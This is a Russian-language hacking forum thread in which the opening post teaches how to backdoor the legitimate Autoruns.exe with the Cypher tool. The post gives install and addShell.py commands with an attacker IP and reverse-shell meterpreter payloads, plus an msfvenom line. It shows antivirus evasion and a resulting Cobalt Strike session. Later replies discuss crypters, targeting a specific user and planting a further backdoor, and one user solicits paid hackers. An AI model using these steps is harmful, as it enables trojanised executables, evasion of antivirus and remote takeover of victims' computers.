Статьи Продолжаем гнуть Антивирус часть 3

Обсуждение в разделе «Статьи», начал(-а) Veil, 4.10.2017.

  1. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 421
    Репутация:
    48
    В третьей части не удалось нагнуть антивирь, но мы не будем унывать, а будем искать другой метод нагиба.
    Вот очередной метод.
    Прикручиваем наш зловред к .ехе файлу авторунса Марка Руссиновича .
    Результат одного из он лайн антивиря : Scanner results:10%Сканер(4/39) обнаружил зловред!
    Другого
    [​IMG]

    [​IMG]

    Наши добрые друзья КасперМский, Аваст, доктор Вэб, Аваст и даже Авира лососнули тунца.

    [​IMG]

    Вы спросите, что это за чудо?
    А чудо называется Cypher - простой инструмент для автоматического добавления shellcode в файлы PE. Файлы PE представляют собой переносимые исполняемые файлы.
    Cypher позволяет просто добавлять shellcode к портативным исполняемым файлам.
    А теперь я покажу как выполняется взлом Венды с помощью шеллкода Cypher

    Качаем
    > git clone https://github.com/xan7r/cypher
    > cd cypher
    > pip2 install pefile capstone

    Берем исполнительный файл к которому мы "прикрутим" шелл , у нас он Autoruns.exe и кладем его в папку cypher. Это важно. Убеждаемся, что находимся в том же каталоге,где мы клонировали cypher.
    [​IMG]
    Вводим команду.
    > cd cypher
    > python addShell.py -f /root/cypher/Autoruns.exe -t 0 -d 10 -H 192.168.1.5 -P 80 -p 1
    Теперь я покажу какие параметры мы указали.

    -f: опция 'f' означает файл. Это нужно указать переносимый исполняемый файл, в который мы хотим создать наш бэкдор. Помните, что некоторые исполняемые файлы упакованы и не позволяют писать код оболочки. Протестируйте и используйте соответственно. Здесь я использую Autoruns.exe, который находится на моем Рабочем столе.

    -t: целевая ОС, для которой вы хотите создать этот бэкдор. К ним относятся четыре варианта: 0,1,2,3. Это для Windows 7 32bit, Windows 7 64 бит, Windows 8.1 64bit и Windows 10 64bit соответственно. Здесь я указал его как 0, так как тестирую его на 32-разрядной ОС Windows 7.

    -d: смещение. Это не что иное, как расстояние между точкой, в которой мы пытаемся ввести наш шеллкод, к точке, где мы точно размещаем наш шеллкод. Даже если вы не понимаете этого предложения выше, позвольте мне рассказать вам, почему это важно. Успех ввода нашего шеллкода в исполняемый файл заключается в том, что исполняемый файл должен работать нормально даже после того, как мы введем наш бэкдор. Exe не должен терпеть крах. По умолчанию это значение равно четырем. Но если ваш exe сбой, установите его на большее значение (я установил его на 10), как я сделал выше.

    -H: IP-адрес атакующего. В нашем случае IP-адрес Kali Linux.

    -P: порт, на который мы хотим вернуть нашу оболочку.

    -p: Обратите внимание на строчные буквы. Это означает полезную нагрузку, которую мы хотим установить. '1' означает Windows / meterpreter / reverse_http. Другие варианты:

    0 - windows / shell / reverse_tcp,
    2- Windows / meterpreter / reverse_http + PrependMigrate,
    3- Windows / meterpreter / reverse_https,
    4- Windows / meterpreter / reverse_https + PrependMigrate

    Использование: использование python addShell.py [ОПЦИИ]
    Пример: python addShell.py -f ./Autoruns.exe -H 192.168.1.10 -P 443 -p 3

    Опции:
    -h, --help показать это справочное сообщение и выйти
    -f FILE Укажите входной файл PE для бэкдора
    -o OUTPUT Укажите местоположение вывода, чтобы сохранить скрытый файл.
    По умолчанию = inputFile_evil.exe
    -H HOSTIP Укажите IP-адрес прослушивающего узла для обратного подключения, например: 192.168.1.10
    -P PORT Укажите номер порта прослушивания, например: 4321
    -s SHELLCODE Укажите пользовательский шеллкод для использования, ПРИМЕЧАНИЕ. Эта функция в бэкдор-режиме добавляет 310 байтов к размеру шекидного кода
    ПРИМЕЧАНИЕ: должно быть в шестнадцатеричном формате feedbeef, рекомендуется использовать следующую команду для правильного форматирования shellcode:
    msfvenom -p windows / meterpreter / reverse_https LHOST = 1.2.3.4 LPORT = 443 -f raw | xxd -p | tr -d ""
    -p PAYLOAD Укажите полезную нагрузку. По умолчанию shell_reverse_tcp. Допустимые значения:
    0 - windows / shell_reverse_tcp
    1 - windows / meterpreter / reverse_http
    2 - windows / meterpreter / reverse_http + PrependMigrate
    3 - windows / meterpreter / reverse_https
    4 - windows / meterpreter / reverse_https + PrependMigrate
    -m MODE Укажите программный режим. Программа была разработана для исполняемых файлов backdoor, но если вам действительно нужно, вы можете отключить обычное выполнение программы в режиме FRONTDOOR.
    Допустимые значения: (по умолчанию 0):
    0 - ЗАДНЯЯ ЧАСТЬ
    1 - ПЕРЕДНИЙ
    -t TARGETOS Укажите целевую операционную систему (используется для сохранения ESP). По умолчанию Win7_64bit. Допустимые значения:
    0 - Win7_32bit
    1 - Win7_64bit
    2 - Win8.1_64bit
    3 - Win10_64bit
    -d OFFSET Укажите расстояние смещения между шелковым кодом и началом пещеры. Рекомендовать увеличить это значение, если PE сбой после оболочки.
    По умолчанию: 4
    -j NUM_JUNK Укажите количество «нежелательных» инструкций для использования в эвристической процедуре байпаса.
    По умолчанию 30
    -J NUM_JUNK_ITER Укажите количество раз, чтобы перебрать все инструкции «Junk», используемые в эвристической процедуре байпаса.
    По умолчанию 20 000 000
    -e NUM_ENCODE Укажите количество случайных операций, используемых для кодирования шеллкода.
    По умолчанию: 10, Макс: 40

    Готовый зловред, лежит в той же папке.
    [​IMG]

    Запускаем на атакуемом хосте и видим, что авторунс спокойно запустился без всяких проблем.
    [​IMG]

    А на своей машине мы получаем сессию Кобальт Страйка.

    [​IMG]
    Вуаля!
    Особая благодарность в написании статьи K800, Kevin Shindel , \/IRUS, BabaDook.
    PS. Забыл написать файл Autoruns.exe 717,0 кБ (716 968 байт)
    а наш зловред Autoruns_evil.exe 700,9 кБ (700 928 байт)

    [​IMG]

    Куда пропали почти 16 кБ ?
     
    #1 Veil, 4.10.2017
    В последний раз редактировалось: 5.10.2017
  2. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    710
    Одобрения:
    812
    Репутация:
    51
  3. DooD

    DooD Moderator

    Регистрация:
    30.09.2010
    Сообщения:
    1 172
    Одобрения:
    384
    Репутация:
    288
    обойди смарт скрин или встроенный виндовый ав)уже года 2 не пользую антивирь...
     
    _________________________
  4. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 421
    Репутация:
    48
    У меня нет вин10, а ставить лень. Так что проверить не могу.
    А если этот, то сам видишь.
    [​IMG]

    И вообще как понять такое?
    [​IMG]
    и это
    [​IMG]
     
    #4 Veil, 5.10.2017
    В последний раз редактировалось: 5.10.2017
  5. Mumu

    Mumu Member

    Регистрация:
    28.03.2017
    Сообщения:
    30
    Одобрения:
    19
    Репутация:
    0
    На первом старые базы (судя по дате в 4-ом столбце). А вообще движки на разных сервисах по разному настраиваются и результаты получаются разные.
     
  6. DooD

    DooD Moderator

    Регистрация:
    30.09.2010
    Сообщения:
    1 172
    Одобрения:
    384
    Репутация:
    288
    эвристика дружище
     
    _________________________
    Это одобряет uzeerpc.
  7. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 421
    Репутация:
    48
    Это даже Ежу( то бишь даже мне) ясно, но есть одно но. Сработает ли?
     
  8. DooD

    DooD Moderator

    Регистрация:
    30.09.2010
    Сообщения:
    1 172
    Одобрения:
    384
    Репутация:
    288
    смотря как настроить
     
    _________________________
  9. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 421
    Репутация:
    48
    Скажем так настройка по умолчанию. Но есть одно но,...
    Какое?
     
  10. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 421
    Репутация:
    48
    Я по поводу эвристики и сигнатуры. какая идет настройка по умолчанию АВ?;)
     
  11. DooD

    DooD Moderator

    Регистрация:
    30.09.2010
    Сообщения:
    1 172
    Одобрения:
    384
    Репутация:
    288
    дам тебе намек попроще.все эти изъебы хорошо , но в связке с криптом.а учитывая характер тобою написанного делается не на залив ,а с целью напасть на конкретного юзера.соответственно париться вообще не надо;)
     
    _________________________
    Это одобряет Veil.
  12. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 421
    Репутация:
    48
    Что значит на залив?;) Если я к юзеру попал, то после сессии, залью и бакдор.)))
    А по поводу " поссоны качайте тут" это не про меня. Прошли те времена, сейчас только цель и все остальное лесом.
     
  13. DooD

    DooD Moderator

    Регистрация:
    30.09.2010
    Сообщения:
    1 172
    Одобрения:
    384
    Репутация:
    288
    На залив это значит на залив)типа связка понял)
     
    _________________________
  14. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 421
    Репутация:
    48
    Это ясно даже и Ежу.;)
     
  15. robingut0001

    robingut0001 New Member

    Регистрация:
    7.10.2017
    Сообщения:
    1
    Одобрения:
    0
    Репутация:
    0
    ищу програмистов хакеров есть работа очень болщийи денги писать личку
     
  16. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 421
    Репутация:
    48
    Здесь нет хакеров, тут все только учатся.
     
    Это одобряют CKAP, ms13 и K800.
  17. K800

    K800 Nobody's Fool

    Регистрация:
    25.12.2010
    Сообщения:
    1 901
    Одобрения:
    2 013
    Репутация:
    346
     
  18. artkar

    artkar Active Member

    Регистрация:
    14.11.2016
    Сообщения:
    299
    Одобрения:
    256
    Репутация:
    2
    Здесь нет хакеров и тут никто уже ничему не учиться.
     
  19. Alangile

    Alangile New Member

    Регистрация:
    28.09.2017
    Сообщения:
    108
    Одобрения:
    2
    Репутация:
    0
    кто то уже нагнул авиру?
     
  20. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 691
    Одобрения:
    2 421
    Репутация:
    48
    Новый Veil, который недавно вышел, гнет пока все антивири.
     
Загрузка...
Similar Threads - Продолжаем гнуть Антивирус
  1. Veil
    Ответы:
    16
    Просмотры:
    3 403
  2. Veil
    Ответы:
    15
    Просмотры:
    3 519
  3. Akeksander
    Ответы:
    0
    Просмотры:
    785
  4. DooD
    Ответы:
    3
    Просмотры:
    8 315